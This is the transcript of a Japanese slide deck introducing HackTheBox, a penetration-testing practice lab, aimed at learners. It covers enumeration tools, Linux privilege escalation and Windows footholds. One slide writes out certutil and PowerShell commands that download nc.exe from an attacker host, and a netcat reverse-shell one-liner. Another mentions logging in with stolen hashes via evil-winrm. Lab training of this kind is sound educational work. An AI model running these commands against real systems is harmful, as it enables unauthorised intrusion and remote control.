Hacktheboxの歩き方.pdf

5f9309c6fe879950878bb3d7b039a7b9?s=47 Aqua
September 16, 2020
940

 Hacktheboxの歩き方.pdf

5f9309c6fe879950878bb3d7b039a7b9?s=128

Aqua

September 16, 2020
Tweet

Transcript

  1. Hacktheboxの歩き方 Wednesday, September 16, 2020

  2. Self introduction • Name : 解析魔法少女あくあ(•̀ ᴗ•́ )و • Job

    : 魔法少女 • Twitter : @WinterLabyrinth • Discord : Aqua#6654 • CTF team : Contrail • Dream : 異世界転生 • Favorite Manga : 王様たちのヴァイキング • Favorite Anime : 残響のテロル
  3. Self introduction – My favorite manga • 王様たちのヴァイキング

  4. Self introduction – My favorite anime • 残響のテロル

  5. Agenda 1. Purpose 2. What’s HackTheBox 3. Registration 4. Hackhebox

    Layout 5. Own the machine • Foothold • Linux • User • Root • Windows • User • root 6. Demonstration 7. Question
  6. Purpose

  7. Purpose • Hacktheboxをプレイするにあたっての全体像をつかむ

  8. What’s HackTheBox

  9. What’s HackTheBox • ペネトレーションテストラボ • WindowsやLinuxなど様々な脆弱なマシンがあり攻撃の練習を することができる • 毎週マシンが追加される。9月16日現在では178個(要課金) •

    https://www.hackthebox.eu/
  10. Registration

  11. Registration • https://www.hackthebox.eu/invite

  12. Hackhebox Layout

  13. Hackhebox Layout

  14. Hackhebox Layout

  15. Hackhebox Layout

  16. Hackhebox Layout • Box, Challenge(CTF), Fortress, Endgame, ProLabがある • Boxがメイン。無課金は20Box+リタイア(2Box)できる

    • 課金は月に1300円程度 • ProLabは別料金
  17. Own the machine

  18. Foothold

  19. Foothold 1. 脆弱な点を探す 2. ユーザ権限のシェルの確保 3. 権限昇格してroot権限の確保

  20. Linux

  21. Own the machine – user - Linux • 基本的にはLinuxがおすすめ。UbuntuでもいいがKali LinuxやParrot

    OSが おすすめ • クレデンシャルが盗めるパターン • リバースシェルが張れるパターン • RCEができるパターン(CVEなど) • 使用する脆弱性 • SQLi • LFI, RFI • パストラバーサルなど • あらゆる脆弱性を組み合わせてシェルの獲得を目的とする
  22. Own the machine – user - Linux • Enumeration (列挙)が重要

    • ポートスキャン(nmap) • nmap –sC –sV –o nmap.log 10.10.10.205 • ファイルを探す(gobuster, dirbuster) • gobuster dir -w /usr/share/wordlists/dirb/common.txt -t 50 -u http://<RHOST>/ -x .php,.txt,.html,.aspx • FUZZ(wfuzz, fuff) • SecLists • https://github.com/danielmiessler/SecLists
  23. Own the machine – root - Linux • 昔のBoxはカーネルエクスプロイトが可能 •

    現在のBoxでは権限のミスを探して権限昇格を試みる • linpeas • https://github.com/carlospolop/privilege-escalation-awesome-scripts- suite • SUIDが立っているファイルがあるか • writebleなファイルがあるか • pspy • https://github.com/DominicBreuker/pspy • Cronjobが走っているか
  24. Windows

  25. Own the machine – user - Windows • nc.exeをRCEでアップロードするタイプの問題が多い •

    certutil.exe -urlcache -f http://10.0.0.5/nc.exe nc.exe • powershell –c “Invoke-WebRequest -Uri http://10.0.0.5/nc.exe nc.exe -OutFile nc.exe” • nc.exeはKali Linuxなら/usr/share/windows-binariesにあります • githubからnc64.exeをダウンロードするのもあり • リバースシェル • nc.exe 10.10.10.10 4444 –e cmd.exe
  26. Own the machine – root - Windows • 5985ポートが開いていた場合 •

    Evil-Winrmの可能性大 • Userシェル後に127.0.0.1で動いている可能性もありポート フォワーディングなどで接続させる • ハッシュでもクレデンシャルを盗めればシェルを張ることが 可能 • https://github.com/Hackplayers/evil-winrm
  27. Demonstration

  28. Demonstration

  29. Thanks for Listening. Any questions?